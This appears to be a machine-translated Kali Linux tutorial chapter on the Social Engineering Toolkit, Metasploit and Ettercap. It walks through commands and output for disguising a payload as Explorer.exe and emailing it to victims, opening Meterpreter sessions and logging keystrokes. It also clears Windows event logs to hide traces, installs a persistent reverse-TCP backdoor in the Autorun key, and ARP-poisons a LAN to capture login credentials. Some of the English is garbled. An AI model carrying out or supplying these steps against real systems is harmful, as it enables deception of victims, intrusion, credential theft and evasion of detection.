Kali-linux Using social engineering Toolkit (SET)

The Social Engineering Toolkit (SET) is an open source, Python-driven, social engineering penetration testing tool. Designed by David Kenned, this toolkit has become a standard for industry-deployed social engineering attacks. Set exploits people's curiosity, trust, greed, and some foolish mistakes to attack the weaknesses of their own existence. Set can be used to pass the attack load to the target system, collect the target system data, create a durable backdoor, carry out a man-in-the-middle attack, etc. This section describes the use of the Social engineering toolkit.

7.3.1 Start Social Engineering toolkit

Before using the Social engineering toolkit, you need to start the tool. The following steps are shown below.

(1) Start set. Execute the following command at the terminal:

[email protected]:~# setoolkit

Or, on the desktop, select Applications | Kali linux| " Exploit Toolset | Social Engineering toolkit|setoolkit command will automatically open a terminal that shows the Setoolkit command to run.

After executing the above command, the following information will be output:

[-] New set_config.py file generated on:2014-05-06 18:05:41.766123[-] Verifying configuration update ... [*] Update verified, config timestamp is:2014-05-06 18:05:41.766123[*] SET is using the new config, no need to Restartcopyrig HT, the Social-engineer Toolkit (SET) by trustedsec, Llcall rights reserved.  Redistribution and use in source and binary forms, with or without modification, is permitted provided that the following  Conditions is met: * Redistributions of source code must retain the above copyright notice, this list of conditions and  The following disclaimer. * redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disc  Laimer in the documentation and/or other materials provided with the distribution.  * Neither the name of Social-engineer Toolkit nor the names of its contributors could be used to endorse or promote products Derived from this software without specific prior written permission. This software isProvided by the COPYRIGHT holders and CONTRIBUTORS ' as is ' and any EXPRESS OR implied warranties, including, but Notlimite D to, the implied warranties of merchantability and FITNESS for A particular PURPOSE is disclaimed. In NO EVENT shall the Copyrightowner OR CONTRIBUTORS is liable for any DIRECT, INDIRECT, incidental, special, exemplary, O R consequential damages (including, but notlimited to, procurement of substitute GOODS OR SERVICES; LOSS of Use, DATA, OR profits; or business interruption) however caused and on anytheory of liability, WHETHER in contract, STRICT liability, OR TORT (in cluding negligence OR OTHERWISE) arising in any-out-of-the-use ofthis software, even IF advised of the possibility of SUCH DAMAGE. The above licensing were taken from the BSD licensing and are applied to Social-engineer Toolkit as well. Note that the Social-engineer Toolkit are provided as is, and are a royalty free Open-source application. Feel free to modify, use, change, market, does whatever you want With it as long as you give the appropriate credits where creditis due (which means giving the authors the credit they des Erve for writing it).  Also Note that by using this software, if you eversee the creator of SET in a bar, you should give him a hug and buy him a Beer. Hug must last at least 5 seconds. Authorholds the right to refuse the hug or the beer. The Social-engineer Toolkit is designed purely for good and not evil. If you is planning on using the "this" tool for malicious purposes, arenot authorized by the "Company" is performing Essments for, your is violating the terms of service and license of this toolset. by Hittingyes (only one time), your agree to the terms of service and so you'll only use this tool for lawful purposes Only. Agree to the terms of service [y/n]:

The output information describes the set in detail. This information will not be displayed until the first time it is run. The interface accepts this part of the information before you can do anything else. Enter Y at this point and the information shown below is displayed:

The above shows the creator, version, Code and menu information of the social engineering toolkit. At this point, you can choose the appropriate number to operate according to your own needs.

(2) Here choose to attack the social engineering, in the menu number is 1, so after set> enter 1, will display the following information:

set> 1     Welcome to the Social-Engineer Toolkit (SET).     The one stop shop for all of your SE needs.   Join us on irc.freenode.net in channel #setoolkit  The Social-Engineer Toolkit is a product of TrustedSec.           Visit: https://www.trustedsec.comSelect from the menu:  1) Spear-Phishing Attack Vectors  2) Website Attack Vectors  3) Infectious Media Generator  4) Create a Payload and Listener  5) Mass Mailer Attack  6) Arduino-Based Attack Vector  7) SMS Spoofing Attack Vector  8) Wireless Access Point Attack Vector  9) QRCode Generator Attack Vector 10) Powershell Attack Vectors 11) Third Party Modules 99) Return back to the main menu.set>

The above information shows the menu options for attacking social engineering, where you can choose to attack the type of engineering and then attack.

(3) Here choose to create an attack payload and listener, enter number 4 as follows:

The output information shows all the attack payloads that can be generated, at which point the appropriate attack load is selected according to your target system.

(4) The target system for the attack in this example is Windows XP 32-bit, so select number 2 here. As shown below:

set:payloads> 2Select one of the below, ‘backdoored executable‘ is typically the best. However,most still get picked up by AV. You may need to do additional packing/cryptingin order to get around basic AV detection.  1) shikata_ga_nai  2) No Encoding  3) Multi-Encoder  4) Backdoored Executable

The output information shows several methods for acquiring AV-based attacks.

(5) Select the 4th Type here, enter the number 4, as follows:

The output information shows a process of setting up a social engineering, in which the specified IP address is bound to the port and a handler is opened. This binds the IP address to the port because there may be multiple NICs on one host, but the port number is constant. When the listener is started, the attack host will wait for the infiltrated system to connect and handle these network connections.

7.3.2 transmitting attack load to target system

The attack payload (Payload) refers to the code that the user expects the target system to execute after a penetration attack. In the Metasploit framework, you can freely select, transmit and implant. For example, a bounce shell is a way to create a network connection from a target host to an attack host and provide a command-line shell attack payload, while the bind Shell attack payload binds the command-line shell to an open listening port on the target system, Attackers can connect to these ports to get shell interaction. The attack load may also be simple to execute some commands on the target system, such as adding user accounts and so on. The following describes how to create an attack payload to the target system.

Transmit the attack payload to the target system. The following steps are shown below.

(1) Social engineering tools installed by default under/usr/share/set, there is an EXE file in this directory named Payload.exe. In order to avoid being discovered by the target host user during penetration testing, it is recommended that the file name be modified before being sent to others. There are many ways to send to other people, such as mail and storage on a USB stick. First switch to the/usr/share/set directory and view the files in that directory. The execution commands are as follows:

From the above, you can see that there is a file named Payload.exe. You can then modify the file's name Explorer.exe, and then send it to someone else.

(2) Modify the Payload.exe file name. The execution commands are as follows:

As you can see from the above, there is currently only one file named Explorer.exe.

(3) Pass the file to someone else. If you are passing it as a message, you need to compress the file. Because Mail does not support sending EXE files. You can use the zip command to compress the file as follows:

[email protected]:/usr/share/set# zip healthfiles explorer.exe adding: explorer.exe (deflated 88%)

As you can see from the input, the Explorer.exe file was successfully compressed. At this point, you can send it to someone else in the form of a message. When the content is opened by a user on the target system, an active session will be established with the attacker. As shown below:

msf exploit(handler) >[*] Sending stage (769024 bytes) to 192.168.41.146[*] Meterpreter session 1 opened (192.168.41.234:443 -> 192.168.41.146:2126) at 2014-05-06 19:25:43 +0800

See above to indicate that the target system has successfully established a session with an attacker. Now, attackers can do what they want to do on the target system.

7.3.3 Collecting target system data

The preceding article describes the transmission of the attack payload to the target system and the successful establishment of the session. When a session is successfully established, an attacker can collect its data from the target system. Collect data from the target system to allow users to use the information as much as possible for further penetration attacks. The data collected for the target system is described below. The specific steps to collect the target system data are as follows.

(1) Activate Meterpreter session. The execution commands are as follows:

msf exploit(handler) > sessions -i 1[*] Starting interaction with 1…

(2) Turn on the keyboard recorder. The execution commands are as follows:

meterpreter > keyscan_startStarting the keystroke sniffer…

(3) Collect data from the target system. The execution commands are as follows:

meterpreter > keyscan_dumpDumping captured keystrokes… <Return> <Return> <Return> <N1> <Return> 2 <Return> 34

From the output information can be seen, the target system has performed a return, entered the number 1, 2 and 34 and so on.

7.3.4 Clear Traces

When an attacker invades the target system, any action that is made may be logged to the target system's log file. In order not to be discovered by the target system, clearing traces is a very important task. Because if found, it can cause a lot of trouble. Now users don't have to worry about this, because Metasploit provides a way to clear all traces easily. The methods for clearing traces using Metasploit are described below. The steps to clear the trace with Metasploit are as follows.

(1) Activate Meterpreter session. The execution commands are as follows:

msf exploit(handler) > sessions -i 1[*] Starting interaction with 1…

(2) The IRB command in Metasploit can clear the trail. The execution commands are as follows:

meterpreter > irb[*] Starting IRB shell[*] The ‘client‘ variable holds the meterpreter client>>

The output information is seen in the >> prompt, indicating that the IRB command was successfully run.

(3) Set the log you want to delete. The common logging options are as follows:

• Log = Client.sys.eventlog.open (' system ');
• Log = Client.sys.eventlog.open (' security ');
• Log = Client.sys.eventlog.open (' application ');
• Log = Client.sys.eventlog.open (' directory service ');
• Log = Client.sys.eventlog.open (' DNS server ');
• Log = Client.sys.eventlog.open (' File Replication Service ').

All logs are cleared here. The execution commands are as follows:

>> log = client.sys.eventlog.open(‘system‘)>> log = client.sys.eventlog.open(‘security‘)>> log = client.sys.eventlog.open(‘application‘)>> log = client.sys.eventlog.open(‘directory service‘)>> log = client.sys.eventlog.open(‘dns server‘)>> log = client.sys.eventlog.open(‘file replication service‘)

After executing the above command, it indicates that the log to be purged is specified. Next you need to execute the log.clear command to clear the log file. The execution commands are as follows:

>> log.clear

After executing the above command, the user's trail will be hidden.

7.3.5 Creating a durable backdoor

When access to the target system is successfully obtained, it is necessary to find a way to restore the connection to the target host without having to enter the target system again. If the target user destroys the connection, such as restarting the computer, using the rear door allows the connection to be automatically re-established with the target system. To facilitate subsequent infiltration, it is necessary to create a backdoor. This will not affect the work even if the connection is interrupted. The following describes creating a durable backdoor. The steps to create a durable backdoor are as follows.

(1) Activate Meterpreter session. The execution commands are as follows:

msf exploit(handler) > sessions -i 1[*] Starting interaction with 1…meterpreter >

(2) before creating a durable backdoor, review its help file. The execution commands are as follows:

The above information shows some options for the durable backdoor. Use different options to set the backdoor.

(3) Create a durable backdoor. The execution commands are as follows:

  meterpreter > Run persistence-u-a-i 10-8090-r 192.168.41.234[*] Running persistance script[*] Resource File for cleanup created At/root/.msf4/logs/persistence/aa-886okjm26fsw_20140507.2857/aa-886okjm26fsw_ 20140507.2857.rc[*] Creating payload=windows/meterpreter/reverse_tcp lhost=192.168.41.234 LPORT=4444[*] Persistent Agent script is 148405 bytes long[+] Persistent script written to c:\docume~1\test\locals~1\temp\izxbdjvcpnd.vbs[*] Start ING connection handler at Port 4444 for windows/meterpreter/reverse_tcp[+] Multi/handler started! [*] Executing script c:\docume~1\test\locals~1\temp\izxbdjvcpnd.vbs[+] Agent executed with PID 1612[*] installing into Autorun as hkcu\software\microsoft\windowscurrentversion\run\merugsie[+] installed into Autorun as hkcu\software\ Microsoft\windowscurrentversion\run\merugsie  

The output information shows a procedure for creating a backdoor. As you can see in the above information, a persistent script has been created in the target system and saved in C:\docume~1\test\locals~1\temp\izxbdjvcpnd.vbs. Also, the script will automatically run on the target host, and a second Meterpreter session will be established. As shown below:

meterpreter > [*] Meterpreter session 2 opened (192.168.41.234:443 -> 192.168.41.146:1032) at 2014-05-07 16:25:47 +0800

Seeing the above output information indicates that the durable backdoor was created successfully.

7.3.6 man-in-the-middle attack (MITM)

Man in the middle Attack, or "MITM attack", is an indirect intrusion attack. This attack pattern is a technique by which a computer controlled by an intruder is placed in a virtual place between two communication computers in a network connection, which is called a "middleman". The following describes the use of the Ettercap tool for man-in-the-middle attacks.

1. Vulnerabilities in existence

The above describes the man-in-the-middle attack by using various technical means to attack the target host. Since the host is being attacked, there is a vulnerability in the process of transmitting data. Next, analyze the vulnerabilities that exist.

When communication occurs between hosts, packets are then forwarded to the target host by encapsulating the packet. The forwarded packets include the source IP address, the destination IP address, and the MAC address. However, when the host cannot find the address of the destination host in its own cache table, it sends an ARP broadcast, in which case the target host may be impersonated by another attacker.

2. ARP Spoofing principle

In the case of a man-in-the-middle attack, an attacker would often consider ARP spoofing or DNS spoofing. The following is an example of common ARP spoofing, which describes the principle of ARP spoofing separately.

In general, ARP spoofing does not make the network not communicate properly, but by impersonating a gateway or other host so that the traffic to the gateway or host is forwarded through the attack host. Traffic can be controlled and viewed by forwarding traffic to control traffic or get confidential information. The ARP spoofing host is shown in Process 7.2.

7.2, when host A and Host B communication, if host a in its own ARP cache table does not find Host B's MAC address, host A will send an ARP broadcast to all the computers in the entire LAN, the broadcast after the entire LAN computer received the data. At this time, host C response to host A, said I was Host B, my MAC address is xx-xx-xx-xx-xx-xx, host a received the address will re-update their own buffer table. When host a communicates with Host B again, the data is forwarded to the attack host (host C), and the stream is forwarded to Host B through host C.

Figure 7.2 ARP Spoofing host

3. Man-in-the-middle attack

There are two stages to achieve a man-in-the-middle attack. The first is to attack a computer by some means, and the second is to deceive the host. Both phases of work are shown in engineering 7.3 and figure 7.4.

First stage:

Figure 7.3 ARP Injection attack

In this stage, Host B through ARP injection attack method to implement ARP spoofing, through the method of ARP spoofing control host A and other host traffic and confidential information.

Phase II:

After the first phase of the attack succeeds, Host B can use the identity of the middleman in this network, forwarding or viewing the data flow between host A and other hosts, as shown in 7.4.

Figure 7.4 Man-in-the-middle attack mechanism

(1) In this LAN, when host a sends a request to host C, the data is sent to Host B at this time.

(2) The data stream sent by host A to host C will be forwarded to host C via Host B.

(3) Host C received data to be sent directly by host A. At this point, host C responds to host A's request, and the same traffic will be forwarded by Host B to host A.

(4) When host a receives a response, it will log on to host C. In this way, host a login user name and password, will be found by Host B.

Use the Ettercap tool for man-in-the-middle attacks. The following steps are shown below.

(1) Start the Ettercap tool. The execution commands are as follows:

[email protected]:~# ettercap -G

After executing the above command, the interface shown in 7.5 will be displayed.

Figure 7.5 Ettercap Start-up interface

(2) The interface is the initial interface of the Ettercap tool. The next step is to achieve a man-in-the-middle attack by grasping packets. In the menu bar, select sniff| Unified the sniffing command or press the SHIFT+U key combination, the interface shown in 7.6 will be displayed.

Figure 7.6 Start sniffing

(3) After clicking the Unified Sniffing command in the interface, the interface shown in 7.7 will be displayed.

Figure 7.7 Selecting an interface

(4) Select the network interface in this interface. Select Eth0 here and click on the "OK" button to display the interface shown in 7.8.

Figure 7.8 Starting the interface interface

(5) After starting the interface, you can scan all the hosts. In the menu bar, select hosts| The Scan for hosts command or press the Ctrl+s key combination, shown in 7.9.

Figure 7.9 Starting the scan host

(6) After you click the scan for hosts command in this interface, the interface shown in 7.10 is displayed.

Figure 7.10 scanning the host interface

(7) The information output from this interface can be seen in a total scan to five hosts. If you want to view the information scanned to the host, in the menu bar, select hosts| The Hosts List command or press the H key, shown in 7.11.

Figure 7.11 Opening the host list

(8) After clicking the hosts List command in this interface, the interface shown in 7.12 will be displayed.

Figure 7.12 all the hosts scanned

(9) The interface shows the IP address and MAC address of the five hosts scanned. Select one of the hosts in the interface as the target system. Select the 192.168.41.151 host here and click the Add to Target 1 button. After adding the target system, start sniffing packets, and in the menu bar, select Start| The Start sniffing command or press the CTRL+W key combination, shown in 7.13.

Figure 7.13 Starting the scan

(10) After initiating the sniffer, it obtains the important information to the target system by using the method of ARP injection attack. To initiate an ARP injection attack, select mitm| in the menu bar ARP Poisonig ... command, shown in 7.14.

Figure 7.14 ARP injection attack diagram

(11) After clicking the arp poisonig command, the interface shown in 7.15 will be displayed. Select the option for the attack in this interface, select Sniff remote connections here. Then click the "OK" button and the interface shown in 7.16 will be displayed.

Figure 7.15 Attack options

Figure 7.16 Attack interface

(12) At this point, when a user logs on to the 192.168.41.151 host, its sensitive information will be passed to the attacker. This example captures the sensitive information shown in 7.17.

Figure 7.17 captured sensitive information

(13) From this interface can be seen, there are users to log on to the 192.168.41.151 host FTP server. Its user name is anonymous and the password is 123456. To stop sniffing after getting this information, in the menu bar, click start| The Stop sniffing command, shown in 7.18.

Figure 7.18 Stop sniffing

(14) After stopping sniffing, you also need to stop the man-in-the-middle attack. In the menu bar, click mitm| The Stop MitM attack (s) command will display the interface shown in 7.19.

Figure 7.19 Stop the man-in-the-middle attack

(15) Click the "OK" button in this interface to successfully complete the man-in-the-middle attack.

Kali-linux Using social engineering Toolkit (SET)